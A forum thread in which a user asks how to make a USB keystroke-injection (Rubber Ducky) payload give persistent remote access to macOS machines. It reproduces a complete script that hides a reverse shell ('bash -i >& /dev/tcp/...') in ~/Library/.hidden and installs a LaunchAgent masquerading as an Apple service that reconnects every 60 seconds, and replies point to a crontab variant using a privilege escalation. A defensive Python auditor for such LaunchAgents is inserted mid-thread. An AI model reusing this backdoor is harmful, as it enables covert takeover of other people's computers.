Posted (edited)

Greetings,

I'm looking for a payload for Rubber Ducky to execute on macOS and give a persistent connection even after a restart of the target. I've found the script below, which can only initiate a reverse connection once. Can anyone help me out to make it persistent, so it runs the reverse connection payload after each reboot or when the machine comes back online after a shutdown?

Here is the script, made by Patrick:

REM Patrick Mosca
REM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING mkdir ~/Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > ~/Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x ~/Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir ~/Library/LaunchAgents
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
GUI q
Edited by Net_Spy
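The agent above persists by dropping a shell script into a dot-directory under ~/Library and a LaunchAgent plist with RunAtLoad and a 60-second StartInterval that relaunches it. From a defender's side, those are exactly the artifacts an audit of ~/Library/LaunchAgents should surface. The following Python script is an added example written for this thread, not code from the original post or from Patrick Mosca's site; the heuristics (hidden-directory paths, Apple-style labels in a user LaunchAgent, interpreter-plus-script arguments whose script contains /dev/tcp redirection, RunAtLoad combined with StartInterval) are my own, and the sample plist and script contents are constructed to mirror the agent in the thread with $HOME expanded to /Users/example.

```python
"""Audit macOS LaunchAgent plists for user-level persistence indicators."""
from __future__ import annotations

import plistlib
import re
from pathlib import Path
from typing import Callable, Optional

# Heuristics (constructed for this example, not from the thread).
HIDDEN_LIBRARY_DIR = re.compile(r"/Library/\.[^/]+/")      # dot-directory under ~/Library
SHELL_INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/zsh"}
NETWORK_SHELL = re.compile(r"/dev/(tcp|udp)/|\bbash\s+-i\b")  # shell bound to a socket
APPLE_STYLE_LABEL = re.compile(r"^com\.apple", re.IGNORECASE)  # also catches "com.apples.*"

ReadFile = Callable[[str], Optional[str]]


def audit_launch_agent(name: str, data: bytes, read_file: ReadFile) -> list[str]:
    """Return human-readable findings for one LaunchAgent plist (empty list = clean)."""
    findings: list[str] = []
    try:
        plist = plistlib.loads(data)
    except Exception as exc:  # malformed XML or binary plist
        return [f"{name}: cannot parse plist ({exc})"]
    if not isinstance(plist, dict):
        return [f"{name}: top-level object is not a dict"]

    label = str(plist.get("Label", ""))
    if APPLE_STYLE_LABEL.match(label):
        # Genuine Apple agents ship in /System/Library/LaunchAgents, not in ~/Library.
        findings.append(f"{name}: Apple-style label {label!r} in a user LaunchAgent")
    if label and name != f"{label}.plist":
        findings.append(f"{name}: file name does not match Label {label!r}")

    args = plist.get("ProgramArguments") or []
    program = plist.get("Program")
    targets = ([program] if isinstance(program, str) else []) + [a for a in args if isinstance(a, str)]
    for target in targets:
        if HIDDEN_LIBRARY_DIR.search(target):
            findings.append(f"{name}: executes from hidden directory: {target}")

    # Interpreter followed by a script path: inspect the script body itself.
    if len(args) >= 2 and args[0] in SHELL_INTERPRETERS:
        body = read_file(args[1])
        if body is not None and NETWORK_SHELL.search(body):
            findings.append(f"{name}: {args[1]} opens a network-connected shell")

    if plist.get("RunAtLoad") and plist.get("StartInterval"):
        findings.append(f"{name}: RunAtLoad plus StartInterval={plist['StartInterval']}s (relaunches on a timer)")
    return findings


def audit_directory(directory: Path) -> dict[str, list[str]]:
    """Audit every .plist in a LaunchAgents directory on a live system."""
    def read_file(path: str) -> Optional[str]:
        try:
            return Path(path).read_text(errors="replace")
        except OSError:
            return None
    return {p.name: audit_launch_agent(p.name, p.read_bytes(), read_file)
            for p in sorted(directory.glob("*.plist"))}


# Constructed sample mirroring the thread's agent, with $HOME expanded.
SAMPLE_PLIST = b"""<plist version="1.0">
<dict>
<key>Label</key><string>com.apples.services</string>
<key>ProgramArguments</key>
<array><string>/bin/sh</string><string>/Users/example/Library/.hidden/connect.sh</string></array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>60</integer>
<key>AbandonProcessGroup</key><true/>
</dict>
</plist>
"""
SAMPLE_FILES = {  # constructed stand-in for the filesystem
    "/Users/example/Library/.hidden/connect.sh":
        "#!/bin/bash\nbash -i >& /dev/tcp/mysite.com/1337 0>&1\nwait\n",
}
# Constructed benign agent: a scheduled backup, nothing hidden, no network shell.
BENIGN_PLIST = b"""<plist version="1.0">
<dict>
<key>Label</key><string>com.example.backup</string>
<key>ProgramArguments</key><array><string>/usr/local/bin/backup</string><string>--nightly</string></array>
<key>StartCalendarInterval</key><dict><key>Hour</key><integer>2</integer></dict>
</dict>
</plist>
"""


def demo() -> list[str]:
    return audit_launch_agent("com.apples.services.plist", SAMPLE_PLIST, SAMPLE_FILES.get)


def benign_demo() -> list[str]:
    return audit_launch_agent("com.example.backup.plist", BENIGN_PLIST, SAMPLE_FILES.get)


if __name__ == "__main__":
    for line in demo() or ["no findings"]:
        print(line)
    print("benign agent:", benign_demo() or "no findings")
```

On a real machine, `audit_directory(Path.home() / "Library/LaunchAgents")` walks the user's agents; the same checks apply to /Library/LaunchAgents and /Library/LaunchDaemons. The script-body check deliberately reads the file the agent points at rather than trusting the plist alone, because a plist that only names /bin/sh and a path looks harmless until the script behind it is inspected.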
Posted (edited)

Hi.

I think that's what you're looking for: https://forums.hak5.org/index.php?/topic/36390-payload-mac-os-x-simple-persistent-reverse-bash/

This payload uses crontab, but it works just as well!

The only problem is that it relies on a privilege escalation vulnerability in OSX Yosemite, which has been patched in OS X 10.10.5, and as far as I'm aware, it's only been tested on Yosemite.

I hope this solves your issue!

V3sth4cks153

Edited by V3sth4cks153
  • 1 month later...
Posted

@V3sth4cks153 Do I need to make the USB firmware twin compose for that, or not?

Regards

Net_Spy

Hi,

No, you don't need to: the script will work on the stock firmware, as it is fully self contained.

Regards,

V3sth4cks153
